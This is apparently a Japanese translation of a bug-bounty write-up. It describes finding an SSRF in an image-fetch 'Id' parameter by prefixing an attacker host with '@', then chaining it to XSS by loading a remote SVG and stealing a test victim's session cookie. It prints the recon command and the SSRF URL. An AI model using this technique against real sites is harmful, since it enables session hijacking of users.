shikata ga nai

Private? There is no such things.

Story of my first cash bounty on hackerone.を訳してみた

Hello there, ('ω')ノ

 

HackerOneでの私の最初の賞金の話を。

 

脆弱性:

 SSRF

 XSS

 

記事:

 https://infosecwriteups.com/story-of-my-first-cash-bounty-on-hackerone-acad282ae962

 

今回は、メインのWebアプリケーションのみをスコープに持つターゲットを。

そのようなターゲットで偵察を開始するたびに。

waybackurlsを使用して多くのエンドポイントを収集しますが。

今回は別のツールを試すことに。

 

 https://github.com/tomnomnom/waybackurls

f:id:ThisIsOne:20210825122557p:plain

 

Linkfinderツールのコマンドは、下記のとおりで。

 python linkfinder.py -i https://example.com -d

 

 https://github.com/GerbenJavado/LinkFinder

f:id:ThisIsOne:20210825122437p:plain

 

実行完了後の結果から注意を引いたのは下記のURLで。

 htttps://www.example.com/image?Id=somelinkwithouthttp.com

 

なぜなら、http://またはhttps://がなかったので。

引数としてURLを受け入れるそのようなパラメーターを見た後は。

ほとんどのバグハンターはSSRFの診断をするので。

Burpコラボレーターを起動し、1つのペイロードをコピーして。

httpまたはhttpsを付加せずに、そのIdパラメータに貼り付けて。

SSRFを期待してEnterキーを押したものの。

残念ながら、コラボレータで下記のDNSリクエストのみを受け取って。

 

f:id:ThisIsOne:20210825115152p:plain


いくつかのことを試した後。

コラボレータのペイロードに@記号を追加することに。

そして、Enterキーを押すと驚くべきことに下記の応答が返されたので。

脆弱性と認められ。

 

f:id:ThisIsOne:20210825115246p:plain


さらに、いくつかのバグでSSRFをチェーンすることに。

そのパラメータが画像をフェッチしていたので。

brutelogic.comのXSS POCリンクを使用してみると。

XSSがポップアップされて。

下記のペイロードで、poc.svgが正常にフェッチされたので。

被害者のセッションCookieを盗むための。

XSSペイロードを含むHTMLファイルを作成することに。

 htttps://www.example.com/image?Id=@brutelogic.com.br/poc.svg

 

f:id:ThisIsOne:20210825115002p:plain

 

下記のファイルを作成し、ngrokを使用してローカルホストでホストして。

このエクスプロイトをテストするために、そのサイトに2つのアカウントを作成して。

下記のペイロードを使用してみると被害者のクッキーが取得できて。

 

f:id:ThisIsOne:20210825114924p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain